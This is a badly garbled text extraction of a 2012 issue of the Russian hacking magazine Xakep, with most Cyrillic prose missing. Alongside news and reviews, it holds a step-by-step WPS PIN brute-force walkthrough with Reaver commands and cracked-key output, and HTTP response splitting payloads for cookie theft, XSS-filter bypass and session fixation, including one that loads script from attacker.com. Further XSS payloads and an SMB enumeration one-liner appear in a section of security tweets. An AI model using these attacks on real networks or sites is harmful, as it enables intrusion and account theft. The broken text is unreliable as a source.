Вы находитесь на странице: 1из 148

GOOGLE CHROME

088

WWW.XAKEP.RU

03 (158) 2012

W3AF

: 230 .


WI-FI
018

WPS,
, .
5-10
WPA-.

024

082

124


HTTP RESPONSE SPLITTING


WINDOWS PHONE 7.5?

HIGHLOAD-
NGINX DJANGO

Intro

3 768

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE

PR-

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906


,
- .
,
.
,
~50
WINLINK.
,
.
,
, ,
3 768
, . : 250 , 50 , 1.2
. ,
,
, , : .
,
.
, (5 ) ,
, , 30 ! ,
!
: :).
P.S.
. :).
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag

03/158/ 2012


.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)

(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012

001

Content

008

HEADER
004
011

MEGANEWS

hacker tweets
-

14

QR-

016
017



Proof-of-concept
: Pastebin.com

COVERSTORY

030

COVERSTORY

COVERSTORY

018

024

Wi-Fi
10
WPA Wi-Fi

WPS

048

070

PCZONE
038
042
048

?
-

CAPTCHA

-
w3af

UNIXOID
104
108

110

052
056
062
066

070
074

Easy-Hack



PHP- Windows

I can crack it!
-,

SMS: 30 !

X-Tools

SYN/ACK
114
120

124

076

082


2011



130

138

094

096

100

Google Chrome

Google

/++


,


!
USB 3.0
Edifier R2500
2.0
WEXLER.BOOK T7055
, ,

140
143
144

088








nginx Django

FERRUM
136

MALWARE


Linux-

-
Fedora

Linux

110

FAQ UNITED
FAQ

8.5
WWW2
web-

MEGANEWS
WPS

WPS (Wi-Fi
Protected Setup)
,
US-CERT.
,
D-Link, Netgear, Linksys Buffalo.
,
PIN-,

.

PIN, ,

, Wi-Fi .
US-CERT :
PIN-
,
EAP-NACK .

, ,
PIN- .
, PIN-.

,
:
10^8 10^3 + 10^4, 11 .

Cover Story .

,
,

,
.

,



WPS.


( YOTA)

LTE .
63
,
150.

004

USB 3.0
, ,
. CES ,
2012 2013 .

LINUX MANDRIVA,

NGI,
.
,
.

GOOGLE
. British
Telecom
.

, APT-,

Sykipot, , ,
-, .
, -

.
Sykipot AlienVault.
ActivIdentity ActivClient,
-, .

PIN-, .
AlienVault ,
2011 ,
.

PIN-. Sykipot
.
, , ,
.

WINDOWS PHONE
MARKETPLACE
50 .
14
(Android Market
19).

IPHONE DEV-TEAM,
-,
iOS 5.01
iPhone 4S iPad 2.


.

03 /158/ 2012

MEGANEWS

23% - NAND Apple.

,
- ?

SOPA
PIPA

RAZER

:
10,1
1280 x
800 ,
Dolby
7.1 (
THX),
Wi-Fi 802.11b/g/n
Bluetooth 3.0.

.

Razer ( )
. , , Razer.
Project Fiona ,
CES 2012.
, , , .
(
) . , . , Project Fiona
Intel Core i7 . , Intel.
,
-
. , , . Razer . ,
.
$1000.

- .

ZAPPOS.COM 24
,

006


SOPA (Stop Online Piracy Act) PIPA
(PROTECT Intellectual Property Act),
, .
, , : (,
, .)
( )
.
,
. .

. , ,
, ,
.

, . , ,
. , , MPAA, RIAA
BSA ( Microsoft, Apple, Adobe,
Intel . .). Google, Twitter, Mozilla,
Facebook, Yahoo, eBay . X,
,
.
, ,
.
,

. Reddit . Google
. WordPress. blackout
.
SOPA. ,
GoDaddy, SOPA, -: GoDaddy.
,
TechCrunch , GoDaddy
- SOPA... ,
.

BSA, , SOPA . ,
, ,
.
SOPA 18
blackout,
. ? , SOPA, ,
, .
. PIPA . ? .
,
, ,
. . .

03 /158/ 2012

BUFFALO CLOUDSTATION
1

7

Buffalo

.
Windows,
MAC OS.
Time Machine.

Buffalo CloudStation
NAS.


: ,
.

BitTorrent-


iOS Android

03 /158/ 2012


(15017545 ),
,
, .

Webaccess
,
Buffalo.

,

: ,
.

Buffalo CloudStation

. ,
, ,
,
.


SATA-II
1 2 .
26 .
,
4
,
.

NAS', Buffalo
CloudStation BitTorrent-
web-.

p2p-: .

007

MEGANEWS

HMEI7 , Siemens.

QR-

MEGAUPLOAD



Megaupload, , , 4% -.
, , , .

Dotcom
. : 20 , 20
! ,
.
.
, Megaupload
. $500 .
,
( -)
$175 .
: , -
FileSonic
(, , ):
, , .
Anonymous
, , , RIAA,
MPAA , -
.


. QR,
,
.
Websense ThreatSeeker Network -,
QR-. , - .
2tag.nl , QR- URL. ,
QR-, .
QR-,
, (
QR-).
:
. ,

.

comScore, 14

18
34



QR-.

QR-
.

THUNDERBOLT
WINDOWS.
DigiTime. ( ), ,
Sony, Asus, Gigabyte Technology ASRock,
Thunderbolt .
.

008

IPV6-
2013 .
2015 IPv6

.

ANDROIDINVASION
GOOGLE , Google


.

03 /158/ 2012

,
GROUP-IB,
.
, IT-:
, Linux.
):
( ):

-
5

"

,
"

:


,

e,
Ariadn
.

, (
Group-IB) :

,
. , ,
:
iPad 2 Wi-Fi 3G 16 Gb.

,

.
:






.
!


:
www.xakep.ru/post/58241/

!
!

MEGANEWS

FACEBOOK Windows,


SAMSUNG PLS-
-
CES 2012
. CES , , , ,
.
, ,
S27B970 Samsung, 9-
-. 27-
, PLS (Plane Line
Switching). , IPS (In-Plane Switching)
Samsung. IPS-
, -
.
Samsung, , : PLS-, ,
,

, . . ,
Samsung .
S27B970 ,
(
- USB-),
.
9- 10 ,
.
QHD (2560 x 1440), DisplayPort,
Dual Link-DVI HDMI, 7 Mobile High Definition
Link (MHL)
.
Samsung Natural Color Expert,
. S27B970
,
,
- . , -
, Samsung 9
. ,
(!)
. -, ,
.
, (

),
. , .
, PLS
,
,
: PLS-
.
, ( , ,
). S27B970
$1199.

: 2560 1440
: 1,07
: 300 /2
(.): 90%
():
1000:1
(GTG): 5
(/.): 178/178

APPLE SAMSUNG
ELECTRONICS ,
GALAXY TAB 10.1
(!)

010

03 /158/ 2012

#hacker tweets
@NeckbeardHacker:

linux.js. ,
JavaScript-
Linux.
?

@cBekrar:

Chrome ASLR + DEP +


10 ? . #pwn2own
:

Vupen
PWN2OWN.
,
...

@meder:

: CVE-2011-3923.

Struts2: http://bit.ly/yFjhxr.
:


,
. , , Java
, RCE- ( ,
Java ), !
...

@RolfRolles:

-:

http://bit.ly/zIqZ5K .
:

... , ,
.

PhoneAndroid:

, -: ...
bit.ly/yoLmba.

Chroot-ing Windows
, :, :, :...
http://bit.ly/yQQqmN.
:

, ...
:

;).
@_sinn3r:

PoC McAfee SaaS


0-day (ZDI-12-012):
obj.ShowReport "calc.exe".

@cBekrar:

#fail-
McAfee Security-as-a-Service,
ActiveX,
bit.ly/xbJtqP via @thezdi.

obj.ShowReport
"calc.exe". ... .
, 0-day ZDI 12 . :) ...

@martincronje:

: HTML5 !=
CSS JavaScript-
jQuery.

@i0n1c:

,
!

...

...

@mikesica:

, ,
.

@jcran:

-- irb> (1..254).each
{|x| puts "host - 10.0.0.#{x}";
`smbclient -L 10.0.0.#{x}
-Uguest -N`}.
:

@f0rki:

PHP :
perchance (condition) { // Code
here } otherwise { // Code here }.

@garethheyes:

XSS- : <xml
ID=xss><x><IMG src=1
onerror=alert(1)></x></
xml><SPAN DATASRC=#xss DATAFLD=$Text
DATAFORMATAS=HTML></SPAN>.

Ruby- ...
@roman_soft:
@stephenfewer:



'Frinder' http://bit.ly/xrUBiW.

03 /158/ 2012

@Ivanlef0u:

BinScope:
http://bit.ly/yzcQYR .

NX, SafeSEH, /dynamicbase, . .

011

MEGANEWS


(CSDN).



,
,

,

- .
,


.

, (,
, ). ,
,
, . ,

, .
: ,
.
. !
. . :) , ,
.
. , . , , -
, , ,
.
: webpolit.livejournal.com/72397.html.


Seagate

Samsung .

$1,375 .

012

NGINX
,
Microsoft IIS. NetCraft,
Apache
(57,93 %).

THE PIRATE BAY


TORRENT- magnet. magnet-URL

.

BSOD WINDOWS 7



Windows 7 x64
w3bd3vil.
win32k.sys
( Win XP),
. , 32-
, 64-
- BSOD,
.
: ,
, ,
. , HTML-. Safari ,
.
iframe
. 64-
Windows 7, , ,
.
.

TORRENTFREAK , Crysis 2

BitTorrent PC
2011 . Call
of Duty: Modern Warfare 3
Battlefield 3.


Twitter

Google . Google .

03 /158/ 2012

GOOGLE MOZILLA Firefox.

MICROSOFT,
ARM-

.
, EDIFIER

Microsoft
,
. , .
2011- Microsoft ,
Windows 8 Secure boot (

UEFI). : UEFI
. , , , UEFI. ,
. Linux-
,
Linux ,
- Linux Windows 8
.
Microsoft ,
Linux ,
, . ,
Windows,

. ,
.
Microsoft ,
Windows 8. , ,
. .
, Windows 8 ,
116: , ARM, Secure Boot
.
Secure Boot , Pkpriv.
Secure Boot UEFI
,
.
, Microsoft ,
Secure Boot,
, ARM-. , ARM,

.
Linux ( ) . ,
, Windows 8,
Linux .
: ?
, .
,
. ,
UEFI, .
, , Microsoft
, Linux, Android ARM-.

Edifier
. 2.0.
- R1500TM ,
. Edifier
( ), -
18- . ,
RCA, , .
R900T.
2.0-, 4-
- 13-
, ,
. R900T
: 140 226 197 .
3,5-
RCA RCA RCA,
, , .


:
Edifier

12

.
.




.

MEGASEARCH.CC

,



03 /158/ 2012

013

MEGANEWS

SECURITY RESEARCH LABS GSM. .

!
,

PWN2OWN


Pwn2Own,

,
(,
) . ,

. Microsoft
Internet Explorer, Apple Safari,
Google Chrome Mozilla
Firefox Windows 7 Mac OS Lion
( ).

.
Hewlett-Packard.
60 , 30
15
, .
Google
Chrome. 20 sandbox-
Chrome. 10
sandbox- Chrome,
.
,
Pwn2Own. , .
.
,
.
Pwn2Own 7 9 . , !

D- , .
( ,
iModela)
,
, .

, , .
, .
-
The Pirate Bay
3D-, -
.
- ,
.

Warhammer 40 - 1970 .
, , 3D- .
,
!
, ,
. ,
.


3D-
RepRap

,

.

Mendel,

(
).


$520.

SONY
XQD.

, .
\
XQD
1 / (125 /).
.
QD-H16 16
$130, QD-H32 32 $230.

.

014



FACEBOOK HACKERCUP,
.
- Facebook,

.

TIOBE SOFTWARE
OBJECTIVE-C
.

-
Java, C,
C# C++.

03 /158/ 2012

SYMANTEC


Symantec,

,
, . Symantec,
, 2006 .
, .
, Norton Antivirus Corporate Edition, Norton
Internet Security, Norton SystemWorks pcAnywhere 12.0,
12.1 12.5. ,
Yama Tough, ,
Lord of Dharmaraja, ,
Norton Utilities.
,
,
Norton Antivirus. , ,
1999 . , Symantec ,

. .
,
. ,
Symantec ( ).
,
, ,
. Symantec
,
scareware-, , .
Symantec,
, , .
, ,
.


LUMINANT MEDIA
93-

ANONYMOUS
03 /158/ 2012

015

HEADER





.

.

KeyPass (keepass.info),
.
,
, . ,
,
? :)
, ,
, KeyPass,

, !
.

1Password (agilebits.com/onepassword), Mac,
Windows.
, $69.99

. , . , -,

LastPass (lastpass.com),
. ,
. -,
(Windows, Linux, Mac),
.
(Firefox, Internet Explorer, Chrome, Safari,
Opera). ($1 )

. -, LastPass
,
,
.
- ,
.
- ,
. -, LastPass ,

016


Dropbox.
- ( ),

. ! :)

LASTPASS
, LastPass, .
, .

LastPass ,
. , Sesame

-.

. -,
Sesame .


, ,
-. !
LastPass
Sesame ( ), ,
, .

Google

Yubikey $25
(store.yubico.com), Google. ,

(Google Authenticator),
.
Gmail,
LastPass.
(helpdesk.lastpass.com/security-options/
google-authenticator).
,
.
$12
.

LastPass

LastPass


,
, . LastPass

, ( 123456). ,
,
.

03 /158/ 2012

Proof-of-Concept

PASTEBIN.COM

- Pastebin.com.
,
,

. .
, .
Lulzsec
( , ) Pastebin.com.
. (pastebin.
com/trends) , :
- Facebook;
- , e-mail
;
IP-
.

:
.
. .
, , ,
.
, , Pastebin.
com, :
Pastie, FrubarPaste, YourPaste, Codepad, Slexy
LodgeIt. PoC
. ,
,

.


, , .
: , malc0de (bit.ly/An58Yd)
NeonTempest (bit.ly/zRuK7o). , ,
PastyCake 9b+ (bit.ly/xHXdfH),
.

Pastebin.com Pastie.org ,
.
SQLite.

MongoDB MySQL. -

Python, :
python gather.py -k kwords -o urls.db \
-a ~pastycake@gmail.com~ harvest

'harvest'
.
e-mail.
-o
. -k
,
. , ,
, . ,

, , .
,
PastyCake, , :
DEFAULT_KEYWORDS = [
'password',
'hack',
]

,
, .
.


, ,

.
, Twitter- PastebinLeaks (twitter.com/#!/
PastebinLeaks), -
Possible Massive mail/pass leak
http://pastebin.com/L6YbD136
Possible listing of http passwords
http://pastebin.com/qZbccMB7
Possible Juniper configuration with
password http://pastebin.com/9vuwzjnS
..

Python

03 /158/ 2012

Trending Pastes ?

,
. z

017

COVERSTORY

(ivinside.blogspot.com)

WPA-
WI-FI

WPS

018

03 /158/ 2012

HOWTO: Wi-Fi 10

HOWTO:
WI-FI
10
, ,
WPA2, .
. - ,
, GPU. ,
,
WPS.

03 /158/ 2012

WWW

WARNING

,

Google
Docs:
goo.gl/3zjfP




.
.

019

COVERSTORY
PIN- bruteforce. .

WPS

PIN- WPS

1. PIN- WPS,


,
,
. ,
.
,
,
,
.
, ,
.
/
. ,

.
WPS (Wi-Fi Protected Setup).

,
, - WPA-.
PIN,
, !
. WPS.
. ,
WPS (, ,
), PIN
!

2. PIN- WPS


() (),
.
.
2. PIN- -.
PIN- ,
( 1),
.
,
.
3. PIN- ( 2).
WPS,

,
PIN-. .
.
! ,

, PIN-
,
10^8 (100 000 000) . . ,
PIN- , .
10^7 (10 000 000) .
! WPS (
3). , ,
. , PIN-
.
, ! :
1. M4 EAP-NACK,
, PIN-
.
2. EAP-NACK M6, , ,
PIN- . 10^4 (10 000)
10^3 (1
000) .
11 000 .
, ,
.
3.
. WPS-:

WPS?
WPS .
.
, -
.
(, ):
PIN, . ,
(Cisco/Linksys,
Netgear, D-Link, Belkin, Buffalo, ZyXEL)
WPS. .

WPS:
1. Push-Button-Connect (PBC).

020

3. WPS

03 /158/ 2012

HOWTO: Wi-Fi 10

, .


-, M3.
,
,

. ,

,
.



wpscrack (goo.gl/9wABj), Python.
Scapy, .
Linux-,

.

, MAC- , MAC-
(SSID).
$ ./wpscrack.py --iface mon0 \
--client 94:0c:6d:88:00:00 \
--bssid f4:ec:38:cf:00:00 --ssid testap -v
sniffer started
trying 00000000
attempt took 0.95 seconds
trying 00010009
<...>
trying 18660005
attempt took 1.08 seconds
trying 18670004
# found 1st half of
PIN
attempt took 1.09 seconds
trying 18670011
attempt took 1.08 seconds

<...>
trying 18674095
# found 2st half of
PIN
<...>
Network Key:
really_really_long_wpa_passphrase_good_
luck_cracking_this_one
<...>

,
PIN-, ,


. ,
,
(61 )
.
, wpscrack
,
:


Tactical Network Solutions. ,
PoC ,
Reaver (code.google.com/p/reaver-wps).

WPS-PIN PSK-, ,

.

.
,

WPS .

HOW-TO
, Linux.
, Reaver BackTrack
(backtrack-linux.org),
-

- WI-FI
1. WEP (Wired Equivalent Privacy)
.

,
RC4.
airodump-ng
aircrack-ng, .
wesside-ng,
WEP
.
2. WPA/WPA2 (Wireless Protected Access)
-

03 /158/ 2012

WPA/WPA2 (

WPA Handshake,
). ,
. , ,
, NVIDIA
CUDA ATI Stream
GPU. aircrack-ng ( ),
cowpatty ( ), pyrit
( ).

4. - PIN- WPS

.
.
0.
BackTrack 5 R1
VMware
ISO. .
,
UNetbootin (unetbootin.
sourceforge.net) :
, ,
, .
1.

root:toor. ,
(
BackTrack GNOME, c KDE):
# startx

2. Reaver
Reaver,
.

(Applications Internet Wicd Network
Manager). ,
:
# apt-get update
# apt-get install reaver

, 1.3,
. , ,

021

COVERSTORY
, , SVN. , ,
(
).
$ svn checkout http://reaver-wps.
googlecode.com/svn/trunk/ reaver-wps
$ cd ./reaver-wps/src/
$ ./configure
$ make
# make install

BackTrack
.
Arch Linux, ,
, PKGBUILD:
$ yaourt -S reaver-wps-svn

3.
Reaver :

;
;
MAC- (BSSID);
, WPS.
,
:
# iwconfig

( wlan0) ,
( ,
Reaver, ).
:
# airmon-ng start wlan0

,
(
mon0).
BSSID.

airodump-ng:
# airodump-ng mon0


.
WPA/WPA2
PSK. ,
.
,
kismet,
. ,
WPS. Reaver (
SVN) wash:
# ./wash -i mon0


, .
-f cap-, ,
, airodump-ng.
Reaver BackTrack wash. ,
.
4.

PIN. Reaver
.
(
) BSSID
:

6. Reaver Pro Reaver

# reaver -i mon0 -b 00:21:29:74:67:50


-vv

-vv
, ,
.
Reaver v1.4 WiFi Protected Setup Attack
Tool
Copyright (c) 2011, Tactical Network
Solutions, Craig Heffner <cheffner@
tacnetsol.com>
[+] Waiting for beacon from
00:21:29:74:67:50
[+] Associated with 00:21:29:74:67:50
(ESSID: linksys)
[+] Trying pin 63979978

PIN , ,
, .
. ,
PIN,
. , :
[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: '64637129'
[+] WPA PSK: 'MyH0rseThink$YouStol3HisCa
rrot!'
[+] AP SSID: 'linksys'

, ,
WPA-PSK, . ,
.

5. c Reaver

022


WPS . , ,
.
, , ,
, . ,
,
. ,
WPS
PIN-,
90 . ,

,
? z

03 /158/ 2012

HOWTO: Wi-Fi 10

FAQ

?
,
A ,
.
Aircrack-ng (bit.ly/wifi_
adapter_list). ,
,

RTL8187L. USB
$20.


"timeout" "out of order"?
-
A
. ,
WPS.

Reaver
, WEP
?
WEP
A
,
(IV),
. ,
- , -

.
WPS

Reaver
PIN-. -
,
,
WPS-. WPS

. ,
,
,
.

ALFA Network
dBi, ,

.

MAC-?
, MAC A mon0,
.
, , wlan0.

Q
A

Reaver
PIN, ?
,
WPS. -

wash: ,
.

Q ?
-
A ,
.

"rate limiting detected"?
,
A WPS.
(
),
(
).
Reaver
1.3, -
.
'--ignore-locks'
SVN.


Reaver
?
,
A ,
,

REAVER
HOWTO
Reaver. WPS
,
. ,
.

5. WPS
, , . Reaver
315 ,
:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250

1. SSID :
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
2. '--dh-small',
,
:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
3. .
:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

6. WPS
PIN-,
. Reaver ,
'--nack':
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. '--eap-terminate' ,
WPS- EAP FAIL:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

4. .
:

8. WPS- ,
PIN-,
. Reaver ,
'--fail-wait':

# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

03 /158/ 2012

023

COVERSTORY

d0znpp (ONsec, http://oxod.ru)

DVD





.




, 2002

HTTP- ,
,

.


,

PHP.
024

WWW

CRLF PHP Internet Explorer 7/8/9.


%0d%0d%20 (%09)

bit.ly/ACOlSL Goodbye HTTP Response


Splitting, and thanks
for all the fish (Stefan
Esser).
bit.ly/wB9QGz


#1.
bit.ly/ABOwbr


#2.
bit.ly/aWQGqx


#3.
IE XSS
(X-XSS-Protection)

03 /158/ 2012

INTRO
: .
, . ,
-
, , , .
(, eval) ,
$_GET['aaa']. ,
. , ,
, .
? ,
- , , .

,
, ,
HTTP Response Splitting.
HTTP-. - ,
HTTP- (
).
, , HTTP-
. ,

03 /158/ 2012

HTTP-
, Cache Poisoning, Crosssite Scripting (XSS) , , Page Hijacking.
cPanel 2010 .
, header("Location:
".__).
:
http://server.com:2082/login/?user=foo&pass=bar&failurl=
%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Eale
rt%28%22
Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/
script%3E%3C!--

XSS:
HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 206
Location:
Content-Type: text/html
<script>alert("Recognize-Security - "+document.cookie);
</script><!-Content-type: text/html
<html><head><META HTTP-EQUIV="refresh" CONTENT="0;URL=
Content-Type: text/html

025

COVERSTORY
&lt;script&gt;alert(&quot;Recognize-Security &quot;+document.cookie);
&lt;/script&gt;&lt;!--"></head><body></body></html>

, -
header("Location: "
.$_GET['backto_url']) header("Location: /index.
php?lang=".$_GET['lang']). Open Redirect,
. ,
HTTP
Response Splitting, ,
PHP ( 2006- ) %0d%0a .
,
.
header() , , ,
.

DISCLAIMER

ZeroNights, . ,
,
, cookies.
, ,
, smuggling-,
.

PHP 4.4.2 5.1.2 ,



. , PHP
4.4.2 5.1.2,
:

HTTP
( HTTP), , HTTP-.
bit.ly/r9pLL, 6 Response (bit.ly/BEAq4).
HTTP- :
RFC-2616
Response = Status-Line; Section 6.1
*(( general-header; Section 4.5
| response-header; Section 6.2
| entity-header ) CRLF); Section 7.1
CRLF
[ message-body ]; Section 7.2

,
CRLF, . URL CRLF %0D%0A.

. ,
CRLF,
.

CRLF PHP
header() (bit.ly/wVbbcd) PHP
HTTP- . . , -

<?php
header("Location: /basic/".$_GET['redirect'].".html");
?>


Warning, :
test.php?xxx=bbb%0a%0dNew-Header:blabla
Warning: Header may not contain more than a single
header, new line detected. in test.php on line 2

,
. ,
:
/* new line safety check */
char *s = header_line, *e = header_line + header_line_
len, *p;
while (s < e && (p = memchr(s, '\n', (e - s)))) {
if (*(p + 1) == ' ' || *(p + 1) == '\t') {
s = p + 1;
continue;
}
efree(header_line);
sapi_module.sapi_error(E_WARNING, "Header may not
contain more than a single header, new line detected.");
return FAILURE;
}

,
LF ( URL- %0A). , - (%09) (%20), . ,
CRLF, LF-. RFC,
, . , RFC
? , . - :

,
Refresh-

026

<?php
header("X-Test1:1\r\n Set-cookie: is1=OK");
header("X-Test2:2\r\n\tSet-cookie: is2=OK");
echo "<script>alert(document.cookie)</script>";
?>

03 /158/ 2012

, Internet Explorer
. , - RFC
, ,
header() IE, ,
Open Redirect. .
.

header() 2006

,
.
Internet Explorer. , .
, PHP %0a (\n LF).
, - ,
.

.
:
#!/usr/bin/perl
use strict;
use warnings;
use Socket;
. . .
listen SERVER, 10;
my $answ = "HTTP/1.1 200 OK\r\n";
for($i=0;$i<256;$i++){
$answ.="Set-cookie: cook-$i=1".chr($i);
}
$answ .="\r\n\r\n<h1>Test splitting bytes</h1>";
. . .

: ,
- (, ,
) ,
CRLF (%0d%0a). -,
HTTP- ,
Set-cookie, 256 .
, - ,
, ,
<N>Set-cookie:... , ,
, , , . ,
, :-). ,

( ).
:
IE 8/9 %0d
Firefox 7 Opera %0d
Chrome %0d %00 (Issue 95992 fixed in rel. 15)
Safari %0d

, , Firefox, CR , CRLF.
,
,
- -! , ,
, 14- Google Chrome,
-

03 /158/ 2012

setcookie()

setcookie()

-. . 95992 Low (
,
, , , ).
15- - ,
, , 17-
. Firefox ,
, RFC. ,
.

XSS
header(),
.

.
client-side-: ,
.
, Content-Length,
, HTTP-.
header() PHP ContentLength 0, . ,
HTTP Response Splitting ( HTTP-)
, Content-Length .
, . , Internet Explorer,
, HTML- , Content-Length.
6- 9- .
-:
<?php
header("X-Header: aaa".$_GET['r']);
?>

Internet Explorer
HTTP-:

027

COVERSTORY

/index.php?r=foobar%0d<html>%0d<h1>TEST</h1>

. , .
XSS-,
:
/index.php?r=foobar%0d<html>%0d<script>
alert(/Splitting/)</script>

, - , . ,
,
. XSS- Internet Explorer,
9-
, , , X-XSS-Protection: 0. ,
,
.
HTTP- :
/index2.php?r=foobar%0dX-XSS-Protection:0%0d<html>%0d
<script>alert(/xss/)</script>

. IE , X-Content-Type-Options,
. . : ( Content-Length).
, header("Location: /index.php?lang=".$_GET['lang'])
Open Redirect
?lang=aaa%0dLocation:http://yandex.ru. ,
, .
( ), .
, Access-Control-Allow-Origin ,
, Opera,
Internet Explorer 8+, Firefox 3.5+, Safari 4+ Google Chrome.
(mzl.la/4srnwm).
,
Access-Control-Allow-Methods, Access-Control-AllowHeaders, Access-Control-Max-Age (
).
, , . Access-Control-AllowOrigin ,
. , , , XHR . ,
Access-Control-Allow-Origin: *
.


RFC, , ,
, , , .
Interner Explorer HTTP-.
,
, .
, Content-Length
, , RFC, HTTP
. ,
, .

, header(). , - ,
. , , : header(), setcookie() setrawcookie().
, ,
header(), $path $domain.
,
. ,
. .
,
header():


, ContentLength, , HTTP-
.
, , X-XSS-Protection,
XSS- Internet Explorer,

if (name && strpbrk(name, "=,; \t\r\n\013\014") != NULL)


{
/* man isspace for \013 and \014 */
zend_error( E_WARNING, "Cookie names can not contain
any of the following'=,; \\t\\r\\n\\013\\014'" );


1. X-Frame-Options. ,

iframe/frame-.
X-Frame-Options:
allow-from attacker.
2. X-Content-Security-Policy.
,
. ,
X-Content-SecurityPolicy: allow 'self', <script src="http://attacker.com/1.js"><script>
. ,
X-

028

Content-Security-Policy: allow http://*:80.


3. Refresh. Refresh.
HTML data Open-redirect: Refresh: 1,data:text/
html,<h1>OK</h1>. Chrome
script. , ,
,
data-,
XSS.
4. Set-cookie.
.
,
( )

,
, ,

.
: foobar:%0dSetCookie:PHPSESSID=FAKED%0dLocation=/
auth.php. ,
,
.
99 % -
Session Fixation (
).

03 /158/ 2012

IE HTML- Content-Length,

return FAILURE;
}
if (!url_encode && value && strpbrk(value,
",; \t\r\n\013\014") != NULL) {
/* man isspace for \013 and \014 */
zend_error( E_WARNING, "Cookie values can not contain
any of the following',; \\t\\r\\n\\013\\014'" );
return FAILURE;
}

strpbrk() ,
. ,

.
.
(, ) strpbrk (php.su/functions/?strpbrk),
. , ,
- ! , PHP
,
- ,
. - .
, . ,
, = .
( 2010
).

COOKIES
- , ,
. setcookie() setrawcookie()
.
. , .
,
, .
, .


,
, .
, , :
<?php
setcookie("param0","PREFIX_".$_GET['p0']);
?>

4096 . , .
! ,
, .
Session Fixation.

:

03 /158/ 2012

XSS- IE

chrome 4096
safari 4091-LEN(cookie_name)
opera 4096
firefox 4096
iexplore 5116-LEN(cookie_name)


, RFC: www.ietf.org/rfc/rfc2109.txt.
RFC at least
20 cookies per unique host or domain name. , 20 20
. . , 1997-
, ,
, .
, RFC, ,
, , .
:
chrome 180
safari ~2800/LEN(cookie_name+cookie_val)
opera 60
firefox 149
iexplore 49

, 20, - 10000 :-). ,


Opera Chrome,
.
,
. ... . PoC Opera Chrome .
, (N+1)- ?
- . , ? ? , ,
. ? , !
Opera Chrome!
,
, , , ,
. , . , ,
. ,
(Chrome, Opera).

OUTRO

, .
,
HTTP Response Splitting, . ,
.
(oxod.ru).
! z

029

COVER STORY

rabota.ru,
.Ru.
@Mail

il.Ru Group.
- Ma

PRUFFI.

030

03 /158/ 2012


.
, ,
. ,
.
. ,
.
, , .
, .

, Gmail -
.
, ,
Google. :)

, . ,
PRUFFI .

. 5060
, .

800 .
PRUFFI 60 000 90 000 . . :)

PRUFFI FRIENDS


- .

?
, .
, ,
15
:
, .
,
.
.

PRUFFI Friends (apps.facebook.com/pruffi_

03 /158/ 2012

friends). , . ,

.
,
:
,
.

.

.
,
. ,
800 ,
?
,
?
.
. , , .

. ,
.

, .

. , ,
,
. -
,
,
1000 .
.

.
, ,
.
PRUFFI .
: 400
. 600 .
- : , - 700

1,5 .
,
(pruffi.
ru/analitika). , , 3040 % , . ? .
, Ruby
100
, ,
.
Ruby- 60 ,
, .
,
.

?

!
, IT .

, .
,
20 , !. ,
.
, ,

.
, (Product Manager'),
, 30. ? ,
. ,

. :) :
,
( ), . ,
. .
,
.

031

COVER STORY
-, :
,
.
- !
. HR-: ,
.
. ,
. :)
. .
. .
, ,
.
Facebook Google,
Foursquare, LinkedIn
. , ,
LinkedIn, - , Groupon.
! ,

.
, . ,

, .
( -)
, ,
. Zynga
, .
Zynga,
, .
.
PRUFFI
.
.
: $500 000
$500 000.
.
,
,
: ,
,
.
!

. ,
,
.
,
, ,
( /IT,
, , ). ,
, , ,
,
.
, .

032

.
. , ,
, -,

. .

? , , -,
,
(iOS,
Android, Symbian, Windows
Phone), .
.
.
.
:
PM (Product manager),
, PM,
. , ,
. :
, ,
. :

,
,
.
. , Omlet.ru,
Enter.ru . . .

.
, .
, . ,
.
. , , ,
,
.

Ostrovok.ru.
.

,
, .
, ,
. , , .
,
:
.
,

200 000 .
. , , ,
180200 .
100120
.
, - 140
. .



.
,
,
. . .
. ,
,
,
.
.
.
, , .
.
, PM
. ,

,
. . ,
. ,
-
, .
, ,

. :) ,

,
Molotok.ru,
Mail.ru.


:
1. Ruby 86 %,
40 %.
2. , , , .
3. .
4. , e-commerce,
50 %.
.
iOS Android. ,

-

03 /158/ 2012

.

, .

.

, ,
, ,
.
.


, .
, ,

. , - .

. ,
.

,

. :
,
.
, . Mail.ru :

, ,
.
,
.
, Mail.ru Group
. ,


. Futubra (futubra.com).


.
:
.

. .

, .
.
.
.

PHP-
Perl-.
Perl, , , . , Ruby,
Perl ,
C++ Java.
. . .

NDA (Non-disclosure
agreement ).

.
: ,
. - .
, . ,
- .
. . , Mail.ru,
, , .
, .
,
, -
. , . ,
- .

. , .
-

